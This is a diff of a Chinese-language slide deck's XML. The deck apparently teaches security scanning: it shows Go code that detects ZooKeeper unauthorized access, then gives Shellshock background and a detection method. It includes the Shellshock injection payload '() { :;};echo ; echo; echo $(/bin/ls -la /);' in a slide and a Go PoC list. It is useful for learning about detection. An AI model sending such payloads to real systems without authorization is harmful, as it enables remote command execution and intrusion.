+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>envi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>"), 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err == nil &amp;&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(string(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>), "Environment") {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Sprintf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("zookeeper://%s", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = string(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Remarks</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Sprintf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>未授权访问，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>s", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Remarks</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = append(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="文本框 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15046D8D-F7C3-0D47-86D4-39F94A85EFEE}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB99DB9-4634-1E48-B326-5CF4257E6E24}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7097,8 +7013,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="3594970"/>
-            <a:ext cx="9745876" cy="1384995"/>
+            <a:off x="1164921" y="1252603"/>
+            <a:ext cx="9983243" cy="646331"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7112,70 +7028,32 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>来自</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>CVSS</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>的评分：破壳漏洞的严重性被定义为</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>10</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>级（最高），今年</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>月爆发的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>OpenSSL“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>心脏出血”漏洞才</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>5</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>级！</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>破壳漏洞存在有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>25</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>年，和</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>Bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>年龄一样。</a:t>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>弱密码检测就是想</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器发送一些默认的密码，如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>有了响应，那么就可以判定改</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器存在弱密码泄露现象</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7183,7 +7061,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030492480"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2605024454"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7215,7 +7093,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E3877A-22AC-EC40-A0A9-2F550024B2D2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7228,8 +7106,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="0"/>
-            <a:ext cx="9307463" cy="809450"/>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="696716"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -7237,18 +7115,22 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Shell</a:t>
+            </a:r>
+            <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>破壳漏洞检测思路</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+              <a:t>破壳检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="文本框 6">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F77767-A903-884B-9C15-F1309F8D0B89}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72084524-DB0D-144A-8471-B96E4A90F314}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7257,8 +7139,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="413359" y="809450"/>
-            <a:ext cx="11448789" cy="1569660"/>
+            <a:off x="913774" y="1315234"/>
+            <a:ext cx="9745876" cy="1938992"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7272,73 +7154,194 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>通过网站</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>www.seebug.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>vuldb</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>/ssvid-88877</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>提供的破壳漏洞检测代码，我们使用想远程的地址发送</a:t>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>2014</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>年</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>9</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>月</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>24</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>日，一位名叫斯特凡</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>·</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>沙泽拉的安全研究者发现了一个名为“破壳”（</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>() { :;};echo ; echo; echo $(/bin/ls -la /);</a:t>
+              <a:t>Shellshock</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
-              <a:t>命令</a:t>
+              <a:t>，</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>，然后检查响应体，通过检查响应体中是否有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>drwxr</a:t>
+              <a:t>也称为“</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>xr</a:t>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>门”或“</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>-x</a:t>
+              <a:t>Bash</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>权限来判断是否能获取权限，虽然漏洞非常危险，但是检测起来思路还是比较明晰，实现代码如下：</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>漏洞”）的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>漏洞。该漏洞如果被渗透，远程攻击者就可以在调用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>shell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后，这些函数内的代码就可以在调用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>时立即执行。</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="文本框 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15046D8D-F7C3-0D47-86D4-39F94A85EFEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="3594970"/>
+            <a:ext cx="9745876" cy="1384995"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>来自</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>CVSS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>的评分：破壳漏洞的严重性被定义为</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>10</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>级（最高），今年</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>月爆发的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>OpenSSL“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>心脏出血”漏洞才</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>级！</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>破壳漏洞存在有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>25</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>年，和</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>Bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>年龄一样。</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9686266"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030492480"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7367,824 +7370,133 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="矩形 3">
+          <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E66787B-38C1-3D45-BFE8-D65BFE28839F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E3877A-22AC-EC40-A0A9-2F550024B2D2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2446751" y="0"/>
-            <a:ext cx="6096000" cy="6524863"/>
+            <a:off x="913775" y="0"/>
+            <a:ext cx="9307463" cy="809450"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>破壳漏洞检测思路</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F77767-A903-884B-9C15-F1309F8D0B89}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="413359" y="809450"/>
+            <a:ext cx="11448789" cy="1569660"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
+          <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>pocList</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> := []</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>string</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>{</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"() { :;};echo ; echo; echo $(/bin/ls -la /);"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>,</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="787878"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>_</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
